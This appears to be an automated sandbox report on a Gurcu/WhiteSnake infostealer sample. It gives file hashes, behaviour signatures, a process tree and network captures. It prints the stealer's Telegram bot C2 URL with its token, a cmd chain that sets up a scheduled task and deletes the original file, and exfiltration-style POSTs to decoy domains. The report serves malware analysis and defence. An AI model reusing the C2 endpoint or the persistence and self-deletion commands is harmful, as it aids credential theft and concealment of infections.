Resubmissions

10/04/2024, 02:49 UTC

240410-da1n1sfe7v 10

10/04/2024, 02:49 UTC

240410-daz3gscc34 10

10/04/2024, 02:48 UTC

240410-dazfyscc32 10

10/04/2024, 02:48 UTC

240410-dayvesfe7s 10

14/10/2023, 03:45 UTC

231014-ea62gage69 10

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64 arch:x86 image:win7-20230831-en locale:en-us os:windows7-x64 system
  • submitted
    14/10/2023, 03:45 UTC

General

  • Target

    B9a5797cb584014f3fede.exe

  • Size

    530KB

  • MD5

    862e7aeb18ba5892f51b5712a213a614

  • SHA1

    99d86e4247f52c3ea9b2bb476af66dfc7707fa8d

  • SHA256

    44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31

  • SHA512

    678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713

  • SSDEEP

    6144:XHClm6SWPoK5Z0EwVSmRPQd/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccHd8JyO:XHCnZxb88RatpvnzZjDv7oj19yTNTY

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6176004110:AAFKA5be4dMwA848HWxzYIzrzzOGIHMOJGc/sendMessage?chat_id=615133582

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe
    "C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "B9a5797cb584014f3fede" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:1780
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2592
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "B9a5797cb584014f3fede" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2852
        • C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe
          "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2808
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2808 -s 1724
            4⤵
              PID:1048
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {377E64C6-E20C-4872-8CE0-734BF4CC2CB4} S-1-5-21-86725733-3001458681-3405935542-1000:ZWKQHIWB\Admin:Interactive:[1]
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1604
        • C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe
          C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe
          2⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:2400
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2400 -s 1724
            3⤵
              PID:2164

        Network

        • flag-us
          DNS
          pornhub.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          pornhub.com
          IN A
          Response
          pornhub.com
          IN A
          66.254.114.41
        • flag-us
          DNS
          google.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          google.com
          IN A
          Response
          google.com
          IN A
          142.250.179.142
        • flag-us
          DNS
          openai.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          openai.com
          IN A
          Response
          openai.com
          IN A
          13.107.213.67
          openai.com
          IN A
          13.107.246.67
        • flag-us
          DNS
          youtube.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          youtube.com
          IN A
          Response
          youtube.com
          IN A
          216.58.214.14
        • flag-us
          DNS
          ip-api.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          ip-api.com
          IN A
          Response
          ip-api.com
          IN A
          208.95.112.1
        • flag-us
          DNS
          blockchain.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          blockchain.com
          IN A
          Response
          blockchain.com
          IN A
          104.16.30.98
          blockchain.com
          IN A
          104.16.29.98
        • flag-us
          DNS
          eset.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          eset.com
          IN A
          Response
          eset.com
          IN A
          91.228.166.47
          eset.com
          IN A
          91.228.167.128
        • flag-us
          DNS
          archive.torproject.org
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          archive.torproject.org
          IN A
          Response
          archive.torproject.org
          IN CNAME
          archive-01.torproject.org
          archive-01.torproject.org
          IN A
          159.69.63.226
        • flag-us
          POST
          http://openai.com/ScdEUc6SlP?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:80
          Request
          POST /ScdEUc6SlP?q=1 HTTP/1.1
          Host: openai.com
          Content-Length: 121
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 307 Temporary Redirect
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Content-Type: text/html
          Content-Length: 0
          Connection: keep-alive
          Location: https://openai.com/ScdEUc6SlP?q=1
          x-azure-ref: 20231014T182058Z-8pshx3ug9h0nd9d4k0nc7gyz3g00000007ug00000000rpcn
          X-Cache: CONFIG_NOCACHE
        • flag-us
          GET
          http://pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:80
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          content-length: 0
          location: https://pornhub.com/nZJ8XB6TLb?q=129
        • flag-nl
          POST
          http://google.com/xINnIoXK0o?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          142.250.179.142:80
          Request
          POST /xINnIoXK0o?q=0 HTTP/1.1
          Host: google.com
          Content-Length: 189
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer
          Content-Length: 1571
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Connection: close
        • flag-de
          GET
          https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
          B9a5797cb584014f3fede.exe
          Remote address:
          159.69.63.226:443
          Request
          GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
          Host: archive.torproject.org
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Server: Apache
          X-Content-Type-Options: nosniff
          X-Frame-Options: sameorigin
          X-Xss-Protection: 1
          Referrer-Policy: no-referrer
          Strict-Transport-Security: max-age=15768000; preload
          Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
          Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
          ETag: "d42801-5f7062f2cbbbf"
          Accept-Ranges: bytes
          Content-Length: 13903873
          Cache-Control: max-age=2592000
          Expires: Mon, 13 Nov 2023 18:20:59 GMT
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-gzip
          Content-Language: en
        • flag-us
          POST
          http://pornhub.com/YvXAWrkHSP?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:80
          Request
          POST /YvXAWrkHSP?q=0 HTTP/1.1
          Host: pornhub.com
          Content-Length: 125
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          content-length: 0
          location: https://pornhub.com/YvXAWrkHSP?q=0
          connection: close
        • flag-us
          GET
          http://openai.com/ftOpuXgkwC?q=229
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:80
          Request
          GET /ftOpuXgkwC?q=229 HTTP/1.1
          Host: openai.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 307 Temporary Redirect
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Content-Type: text/html
          Content-Length: 0
          Connection: keep-alive
          Location: https://openai.com/ftOpuXgkwC?q=229
          x-azure-ref: 20231014T182058Z-t0wduq2e3x3sf7qndnf55yas5000000000b000000001tbby
          X-Cache: CONFIG_NOCACHE
        • flag-us
          GET
          http://ip-api.com/line?fields=query,country
          B9a5797cb584014f3fede.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /line?fields=query,country HTTP/1.1
          Host: ip-api.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 25
          Access-Control-Allow-Origin: *
          X-Ttl: 60
          X-Rl: 44
        • flag-sk
          POST
          http://eset.com/0O9WHnWMZM?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          91.228.166.47:80
          Request
          POST /0O9WHnWMZM?q=0 HTTP/1.1
          Host: eset.com
          Content-Length: 113
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          Server: nginx
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Content-Type: text/html
          Content-Length: 178
          Connection: close
          Location: https://www.eset.com/0O9WHnWMZM?q=0
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:00 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:58 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e45db266d8-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:58 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e49dfb66d8-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:58 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e4ae0f66d8-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:59 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e51e8566d8-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:59 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e53ea766d8-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:58 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e45bd06720-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:58 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:58 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e49c2e6720-AMS
        • flag-us
          GET
          https://pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          server: openresty
          date: Sat, 14 Oct 2023 18:20:59 GMT
          content-type: text/html
          content-length: 166
          location: https://www.pornhub.com/nZJ8XB6TLb?q=129
          x-frame-options: SAMEORIGIN
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC0A-42FE722901BB1C2393-A15698F; Secure; Samesite=None
          set-cookie: __l=652ADC0A-42FE722901BB1C2393-A15698F; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          GET
          https://openai.com/ftOpuXgkwC?q=229
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:443
          Request
          GET /ftOpuXgkwC?q=229 HTTP/1.1
          Host: openai.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 404 Not Found
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Content-Type: text/html
          Content-Length: 1944
          Connection: keep-alive
          Vary: Accept-Encoding
          Vary: Accept-Encoding
          Vary: Accept-Encoding
          Vary: Accept-Encoding
          Cache-Control: no-cache
          Content-Range: bytes 0-1943/1944
          ETag: "48563893"
          Last-Modified: Fri, 13 Oct 2023 23:39:46 GMT
          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
          Referrer-Policy: same-origin
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          X-DNS-Prefetch-Control: off
          X-Frame-Options: SAMEORIGIN
          x-azure-ref: 20231014T182059Z-b94v73cm5x443981gazmp3p5p400000002a000000001gnyk
          X-Cache: TCP_MISS
        • flag-us
          GET
          https://pornhub.com/YvXAWrkHSP?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /YvXAWrkHSP?q=0 HTTP/1.1
          Host: pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          server: openresty
          date: Sat, 14 Oct 2023 18:20:59 GMT
          content-type: text/html
          content-length: 166
          location: https://www.pornhub.com/YvXAWrkHSP?q=0
          x-frame-options: SAMEORIGIN
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC0A-42FE722901BB54E8A-A7BD9C9; Secure; Samesite=None
          set-cookie: __l=652ADC0A-42FE722901BB54E8A-A7BD9C9; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          POST
          https://openai.com/ScdEUc6SlP?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:443
          Request
          POST /ScdEUc6SlP?q=1 HTTP/1.1
          Host: openai.com
          Content-Length: 121
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 405 Method Not Allowed
          Cache-Control: no-cache
          Allow: GET, HEAD, OPTIONS
          X-Cache: CONFIG_NOCACHE
          X-Azure-Ref: 0DNwqZQAAAABqCvWc0YhwQIRyCYTTUP1QQlJVMzBFREdFMTEwOAA3ZjE3YzA2NC00MTQ5LTQ2ODctOTk4Yy00ZDliMjE2YjI1OGY=
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Content-Length: 0
        • flag-nl
          POST
          http://google.com/xINnIoXK0o?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          142.250.179.142:80
          Request
          POST /xINnIoXK0o?q=0 HTTP/1.1
          Host: google.com
          Content-Length: 189
          Expect: 100-continue
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer
          Content-Length: 1571
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Connection: close
        • flag-nl
          POST
          http://google.com/xINnIoXK0o?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          142.250.179.142:80
          Request
          POST /xINnIoXK0o?q=0 HTTP/1.1
          Host: google.com
          Content-Length: 189
          Expect: 100-continue
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer
          Content-Length: 1571
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Connection: close
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:59 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e53c866655-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:59 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d6e55c926655-AMS
        • flag-us
          DNS
          www.blockchain.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          www.blockchain.com
          IN A
          Response
          www.blockchain.com
          IN A
          104.16.29.98
          www.blockchain.com
          IN A
          104.16.30.98
        • flag-us
          DNS
          www.eset.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          www.eset.com
          IN A
          Response
          www.eset.com
          IN CNAME
          www-eset-com.trafficmanager.net
          www-eset-com.trafficmanager.net
          IN CNAME
          www.eset.com.edgesuite.net
          www.eset.com.edgesuite.net
          IN CNAME
          a1281.dscr.akamai.net
          a1281.dscr.akamai.net
          IN A
          23.72.252.169
          a1281.dscr.akamai.net
          IN A
          23.72.252.139
        • flag-us
          DNS
          www.blockchain.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          www.blockchain.com
          IN A
          Response
          www.blockchain.com
          IN A
          104.16.30.98
          www.blockchain.com
          IN A
          104.16.29.98
        • flag-nl
          GET
          https://www.eset.com/0O9WHnWMZM?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          23.72.252.169:443
          Request
          GET /0O9WHnWMZM?q=0 HTTP/1.1
          Host: www.eset.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          Content-Type: text/html
          Content-Length: 162
          Location: https://www.eset.com/0O9WHnWMZM/?q=0
          Referrer-Policy: no-referrer-when-downgrade
          Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
          X-Frame-Options: SAMEORIGIN
          X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
          X-Content-Type-Options: nosniff
          Access-Control-Allow-Origin: https://www.eset.com
          Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
          X-EDPS-Request-Status: normal
          Strict-Transport-Security: max-age=15724800
          Cache-Control: public, max-age=3600
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Connection: keep-alive
          Set-Cookie: TS01a40e5a=016c9a7a13324ca8455d134f4b76c2f82ee3e978b2b1559734a7fe4e2248de09ee26d5f82635873930c51671b2c9f31dd2cb1ebafa; Path=/; Domain=.eset.com
        • flag-nl
          GET
          https://www.eset.com/0O9WHnWMZM/?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          23.72.252.169:443
          Request
          GET /0O9WHnWMZM/?q=0 HTTP/1.1
          Host: www.eset.com
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer-when-downgrade
          Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
          X-Frame-Options: SAMEORIGIN
          X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
          X-Content-Type-Options: nosniff
          Access-Control-Allow-Origin: https://www.eset.com
          Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
          X-EDPS-Request-Status: normal
          Strict-Transport-Security: max-age=15724800
          Cache-Control: max-age=3562
          Date: Sat, 14 Oct 2023 18:21:01 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Connection: Transfer-Encoding
          Set-Cookie: TS01a40e5a=016c9a7a13b5642e554b34559a78797db0555ba8fee301005fdb5a4f2d39622dfe7f11d846e9c631f6308bc0f4bc73b62fc1432eda; Path=/; Domain=.eset.com
        • flag-us
          DNS
          www.pornhub.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          www.pornhub.com
          IN A
          Response
          www.pornhub.com
          IN CNAME
          pornhub.com
          pornhub.com
          IN A
          66.254.114.41
        • flag-us
          GET
